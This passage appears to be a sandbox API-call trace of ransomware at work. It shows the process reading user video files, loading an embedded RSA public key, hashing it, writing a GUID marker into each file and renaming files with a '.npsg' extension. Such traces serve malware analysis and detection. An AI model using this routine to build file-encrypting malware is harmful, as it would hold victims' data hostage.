KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.864] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.864] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.864] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.865] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.865] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.865] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.865] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.865] GetLastError () returned 0x0 [0245.865] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.865] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.865] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.865] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.865] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7c70) returned 0x3b99d50 [0245.866] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fd60 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fda8 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890a8 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89108 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0245.866] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890a8 | out: hHeap=0x620000) returned 1 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0245.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89108 [0245.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0245.867] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7c69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.867] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0245.867] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.867] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.867] CloseHandle (hObject=0x644) returned 1 [0245.868] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\9BeflsOe8TC9OTqDHN7Q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\9beflsoe8tc9otqdhn7q.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\9BeflsOe8TC9OTqDHN7Q.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\9beflsoe8tc9otqdhn7q.mkv.npsg")) returned 1 [0245.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.906] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0245.937] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4beedf00, ftCreationTime.dwHighDateTime=0x1d5bc02, ftLastAccessTime.dwLowDateTime=0xdfea3250, ftLastAccessTime.dwHighDateTime=0x1d5bcce, ftLastWriteTime.dwLowDateTime=0xdfea3250, ftLastWriteTime.dwHighDateTime=0x1d5bcce, nFileSizeHigh=0x0, nFileSizeLow=0x4e08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TVHBi_paVPI4HWd.mkv", cAlternateFileName="TVHBI_~1.MKV")) returned 1 [0245.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.949] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\TVHBi_paVPI4HWd.mkv") returned=".mkv" [0245.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\TVHBi_paVPI4HWd.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\tvhbi_pavpi4hwd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.957] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=19976) returned 1 [0245.957] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.959] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4de2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.959] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.961] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0245.961] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x4e08, lpOverlapped=0x0) returned 1 [0245.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.962] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.964] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.964] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.964] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.965] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.965] GetLastError () returned 0x0 [0245.978] GetLastError () returned 0x0 [0245.978] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.978] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.984] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.984] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.984] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4e10) returned 0x3b99d50 [0245.984] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0245.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0245.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0245.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0245.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fda8 [0245.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fdf0 [0245.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0246.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0246.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890d8 [0246.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0246.012] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0246.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0246.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890d8 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b890c0 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0246.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0246.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0246.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0246.064] GetCurrentThreadId () returned 0x5b4 [0246.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a948 [0246.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0246.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.089] GetCurrentThreadId () returned 0x5b4 [0246.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890d8 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890a8 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89138 [0246.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89108 [0246.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890f0 [0246.108] HeapFree (in: hHeap=0x620000, 